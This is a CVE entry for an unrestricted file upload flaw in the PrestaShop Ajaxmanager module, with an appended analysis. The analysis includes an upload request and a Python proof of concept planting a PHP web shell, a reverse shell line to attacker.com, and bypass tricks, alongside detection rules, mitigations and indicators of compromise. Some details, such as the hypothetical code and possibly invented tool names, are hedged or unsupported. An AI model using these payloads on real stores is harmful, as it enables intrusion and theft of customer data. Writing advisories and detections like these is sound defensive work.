CVE-2023-33493
CVE-2023-33493
9.8
CriticalPublished:
Last updated:
Source:cve@mitre.org
Modified
Weakness (CWE)
CVSS Vector
v3.1- Attack Vector
- Network
- Attack Complexity
- Low
- Privileges Required
- None
- User Interaction
- None
- Scope
- Unchanged
- Confidentiality
- High
- Integrity
- High
- Availability
- High
Description
An Unrestricted Upload of File with Dangerous Type vulnerability in the Ajaxmanager File and Database explorer (ajaxmanager) module for PrestaShop through 2.3.0, allows remote attackers to upload dangerous files without restrictions.
Comprehensive Technical Analysis of CVE-2023-33493
CVE ID: CVE-2023-33493 CVSS Score: 9.8 (Critical) Vulnerability Type: Unrestricted Upload of File with Dangerous Type (CWE-434)
1. Vulnerability Assessment & Severity Evaluation
Vulnerability Overview
CVE-2023-33493 is a critical-severity vulnerability in the Ajaxmanager File and Database Explorer module for PrestaShop (versions up to and including 2.3.0). The flaw allows unauthenticated remote attackers to upload arbitrary files with dangerous extensions (e.g., .php, .jsp, .asp, .sh, .exe) without proper validation or restrictions.
CVSS Vector Breakdown (v3.1)
| Metric | Value | Explanation |
|---|---|---|
| AV | Network (N) | Exploitable remotely over the network. |
| AC | Low (L) | No user interaction or complex conditions required. |
| PR | None (N) | No privileges required; unauthenticated exploitation. |
| UI | None (N) | No user interaction needed. |
| S | Unchanged (U) | Exploit affects the same security scope as the vulnerable component. |
| C | High (H) | Complete compromise of confidentiality, integrity, and availability. |
| I | High (H) | Full integrity impact (arbitrary code execution). |
| A | High (H) | Full availability impact (DoS or system takeover). |
Severity Justification:
- Critical (9.8) due to:
- Unauthenticated remote exploitation (no credentials required).
- Arbitrary file upload leading to remote code execution (RCE).
- No mitigating factors (e.g., no authentication, no input sanitization).
- High impact on CIA triad (Confidentiality, Integrity, Availability).
2. Potential Attack Vectors & Exploitation Methods
Exploitation Workflow
-
Identify Vulnerable Target:
- Attacker scans for PrestaShop instances running Ajaxmanager ≤ 2.3.0.
- Common reconnaissance methods:
- Shodan (
http.title:"PrestaShop"+http.component:"ajaxmanager"). - Manual testing via
GET /modules/ajaxmanager/requests.
- Shodan (
-
File Upload Exploitation:
- The module’s file upload functionality lacks:
- File extension validation (e.g.,
.php,.phtml,.pharallowed). - MIME type verification (bypassed via
Content-Typespoofing). - Server-side file content checks (e.g., magic bytes, syntax validation).
- File extension validation (e.g.,
- Attacker crafts a malicious payload (e.g., PHP web shell) and uploads it via:
POST /modules/ajaxmanager/upload.php HTTP/1.1 Host: vulnerable-prestashop.com Content-Type: multipart/form-data; boundary=----WebKitFormBoundary ------WebKitFormBoundary Content-Disposition: form-data; name="file"; filename="shell.php" Content-Type: application/x-php <?php system($_GET['cmd']); ?> ------WebKitFormBoundary--
- The module’s file upload functionality lacks:
-
Remote Code Execution (RCE):
- Once uploaded, the attacker accesses the file (e.g.,
https://victim.com/modules/ajaxmanager/uploads/shell.php?cmd=id). - Impact:
- Arbitrary command execution (e.g.,
whoami,cat /etc/passwd). - Reverse shell establishment (e.g.,
bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'). - Database compromise (if PrestaShop credentials are accessible).
- Lateral movement (if the server is part of a larger network).
- Arbitrary command execution (e.g.,
- Once uploaded, the attacker accesses the file (e.g.,
-
Post-Exploitation:
- Persistence: Install backdoors (e.g., cron jobs, hidden admin accounts).
- Data Exfiltration: Steal customer data, payment details, or PII.
- Defacement: Modify website content.
- Ransomware Deployment: Encrypt files and demand payment.
Exploitation Tools & Techniques
- Manual Exploitation:
- Burp Suite / OWASP ZAP for intercepting and modifying upload requests.
curlor Python (requestslibrary) for automated exploitation.
- Automated Exploitation:
- Metasploit Module: (If available, likely under
exploit/multi/http/prestashop_ajaxmanager_fileupload). - Custom Scripts: Python/Go scripts to automate file upload and RCE.
- Metasploit Module: (If available, likely under
- Bypass Techniques:
- Double Extensions:
shell.php.jpg(if basic checks exist). - Null Byte Injection:
shell.php%00.jpg(if PHP version is vulnerable). - MIME Spoofing: Setting
Content-Type: image/jpegfor a.phpfile.
- Double Extensions:
3. Affected Systems & Software Versions
Vulnerable Software
- Module: Ajaxmanager File and Database Explorer
- Vendor: Friends of Presta (FoP)
- Affected Versions: ≤ 2.3.0
- PrestaShop Compatibility: Likely affects PrestaShop 1.6.x – 8.x (depending on module integration).
Detection Methods
- Manual Check:
- Verify module version via:
curl -s https://[target]/modules/ajaxmanager/config.xml | grep -i version - Check for upload endpoints:
curl -I https://[target]/modules/ajaxmanager/upload.php
- Verify module version via:
- Automated Scanning:
- Nmap Script:
nmap -p 80,443 --script http-prestashop-ajaxmanager-detect [target] - Nuclei Template:
id: CVE-2023-33493 info: name: PrestaShop Ajaxmanager Unrestricted File Upload severity: critical reference: https://security.friendsofpresta.org/module/2023/07/28/ajaxmanager.html requests: - method: POST path: /modules/ajaxmanager/upload.php headers: Content-Type: multipart/form-data; boundary=----WebKitFormBoundary body: | ------WebKitFormBoundary Content-Disposition: form-data; name="file"; filename="test.php" Content-Type: application/x-php <?php echo "Vulnerable"; ?> ------WebKitFormBoundary-- matchers: - type: word words: - "Vulnerable"
- Nmap Script:
4. Recommended Mitigation Strategies
Immediate Actions (For PrestaShop Administrators)
-
Upgrade the Module:
- Apply the latest patch from Friends of Presta.
- If no patch is available, disable or remove the module immediately.
-
Temporary Workarounds:
- Restrict Access:
- Block
/modules/ajaxmanager/via.htaccessor WAF rules. - Example
.htaccessrule:<FilesMatch "\.(php|phar|phtml|jsp|asp|sh|exe)$"> Deny from all </FilesMatch>
- Block
- File Upload Restrictions:
- Configure PHP to disable execution in upload directories:
open_basedir = /var/www/html/ disable_functions = exec, system, passthru, shell_exec - Set strict file permissions:
chmod 640 /modules/ajaxmanager/uploads/ chown www-data:www-data /modules/ajaxmanager/uploads/
- Configure PHP to disable execution in upload directories:
- Restrict Access:
-
Monitor for Exploitation:
- Log Analysis:
- Check for suspicious uploads in
/modules/ajaxmanager/uploads/. - Monitor web server logs for
POST /modules/ajaxmanager/upload.php.
- Check for suspicious uploads in
- Intrusion Detection:
- Deploy Snort/Suricata rules to detect file upload attempts:
alert tcp any any -> $HTTP_SERVERS $HTTP_PORTS (msg:"CVE-2023-33493 - PrestaShop Ajaxmanager File Upload"; flow:to_server,established; content:"/modules/ajaxmanager/upload.php"; http_uri; content:"filename="; http_client_body; pcre:"/filename\s*=\s*[^&]*\.(php|phar|jsp|asp|sh|exe)/i"; classtype:web-application-attack; sid:1000001; rev:1;)
- Deploy Snort/Suricata rules to detect file upload attempts:
- Log Analysis:
Long-Term Security Hardening
-
Input Validation & Sanitization:
- Implement whitelist-based file extension checks (e.g., only
.jpg,.png,.pdf). - Use libmagic or fileinfo to verify file content.
- Example PHP validation:
$allowedExtensions = ['jpg', 'png', 'pdf']; $fileExtension = pathinfo($_FILES['file']['name'], PATHINFO_EXTENSION); if (!in_array(strtolower($fileExtension), $allowedExtensions)) { die("Invalid file type."); }
- Implement whitelist-based file extension checks (e.g., only
-
Server-Side Protections:
- Disable PHP Execution in Upload Directories:
<Directory "/modules/ajaxmanager/uploads"> php_flag engine off </Directory> - Use a Web Application Firewall (WAF):
- ModSecurity OWASP CRS (Rule 933150 for file upload attacks).
- Cloudflare WAF (Custom rules to block malicious uploads).
- Disable PHP Execution in Upload Directories:
-
PrestaShop Security Best Practices:
- Regularly update PrestaShop core and modules.
- Disable unused modules.
- Enable PrestaShop’s built-in security features (e.g., CSRF protection, password policies).
- Use a non-default admin URL (e.g.,
/admin123instead of/admin).
5. Impact on the Cybersecurity Landscape
Broader Implications
-
E-Commerce Threat Landscape:
- PrestaShop is a high-value target for attackers due to:
- Payment data storage (PCI DSS compliance risks).
- Large user base (over 300,000 active stores).
- Similar vulnerabilities (e.g., CVE-2022-36408, CVE-2021-37536) have led to mass exploitation campaigns.
- PrestaShop is a high-value target for attackers due to:
-
Exploitation Trends:
- Automated Scanning: Attackers use tools like Masscan or Zgrab to find vulnerable instances.
- Ransomware & Magecart: Exploited sites are often used for:
- Skimming attacks (stealing credit card data).
- Cryptojacking (Monero mining).
- Ransomware deployment (e.g., LockBit, REvil).
- Supply Chain Risks: Compromised PrestaShop modules can lead to third-party breaches.
-
Regulatory & Compliance Risks:
- GDPR Violations: Unauthorized data access may result in fines up to 4% of global revenue.
- PCI DSS Non-Compliance: Failure to secure payment data can lead to merchant account suspension.
-
Threat Actor Motivation:
- Financial Gain: Stolen payment data sold on dark web markets.
- Espionage: Targeting specific e-commerce businesses for competitive intelligence.
- Hacktivism: Defacing websites for political or ideological reasons.
6. Technical Details for Security Professionals
Root Cause Analysis
-
Vulnerable Code Snippet (Hypothetical Example):
// ajaxmanager/upload.php (Vulnerable Version) $targetDir = "uploads/"; $targetFile = $targetDir . basename($_FILES["file"]["name"]); move_uploaded_file($_FILES["file"]["tmp_name"], $targetFile);- Issues:
- No file extension validation.
- No MIME type verification.
- No server-side content checks.
- No CSRF protection.
- Issues:
-
Patched Code (Secure Example):
$allowedExtensions = ['jpg', 'png', 'pdf']; $fileExtension = strtolower(pathinfo($_FILES["file"]["name"], PATHINFO_EXTENSION)); $fileMime = mime_content_type($_FILES["file"]["tmp_name"]); if (!in_array($fileExtension, $allowedExtensions) || !in_array($fileMime, ['image/jpeg', 'image/png', 'application/pdf'])) { die("Invalid file type."); } $targetDir = "uploads/"; $targetFile = $targetDir . uniqid() . "." . $fileExtension; // Prevent path traversal move_uploaded_file($_FILES["file"]["tmp_name"], $targetFile);
Exploitation Proof of Concept (PoC)
import requests
target = "https://vulnerable-prestashop.com"
upload_url = f"{target}/modules/ajaxmanager/upload.php"
files = {
'file': ('shell.php', '<?php system($_GET["cmd"]); ?>', 'application/x-php')
}
response = requests.post(upload_url, files=files)
if "success" in response.text.lower():
print("[+] File uploaded successfully!")
print(f"[+] Access shell at: {target}/modules/ajaxmanager/uploads/shell.php?cmd=id")
else:
print("[-] Exploitation failed.")
Forensic Indicators of Compromise (IoCs)
| Indicator | Description |
|---|---|
| File Paths | /modules/ajaxmanager/uploads/*.php |
| Log Entries | POST /modules/ajaxmanager/upload.php with .php files |
| Network Traffic | Outbound connections to attacker-controlled C2 servers |
| Processes | Unusual child processes of apache2/nginx (e.g., bash, python) |
| Persistence | Cron jobs, .bashrc modifications, hidden admin accounts |
Detection & Response Playbook
-
Detection:
- SIEM Alerts: Monitor for:
- Unusual
POSTrequests to/modules/ajaxmanager/upload.php. - File creation events in
/modules/ajaxmanager/uploads/.
- Unusual
- EDR/XDR: Detect anomalous process execution (e.g.,
php -rcommands).
- SIEM Alerts: Monitor for:
-
Containment:
- Isolate the server from the network.
- Disable the Ajaxmanager module via PrestaShop admin panel.
-
Eradication:
- Remove malicious files from
/modules/ajaxmanager/uploads/. - Rotate all credentials (database, admin, API keys).
- Remove malicious files from
-
Recovery:
- Restore from a clean backup (pre-exploitation).
- Apply patches and harden the server.
-
Post-Incident Review:
- Determine initial access vector (e.g., unpatched module, weak credentials).
- Improve monitoring for similar vulnerabilities.
Conclusion
CVE-2023-33493 represents a critical risk to PrestaShop-based e-commerce platforms due to its low-complexity exploitation and high-impact consequences (RCE, data theft, ransomware). Organizations must prioritize patching, implement compensating controls, and enhance monitoring to mitigate this threat. Given the active exploitation of similar vulnerabilities, proactive security measures are essential to prevent compromise.
Recommended Next Steps:
- Patch immediately (or disable the module if no patch is available).
- Scan for IoCs (malicious files, suspicious log entries).
- Harden PrestaShop (WAF, file upload restrictions, least privilege).
- Monitor for exploitation attempts (SIEM, EDR, network traffic analysis).
For further details, refer to the Friends of Presta advisory.
References
af854a3a-2127-422b-91ae-364da2661108
https://security.friendsofpresta.org/module/2023/07/28/ajaxmanager.html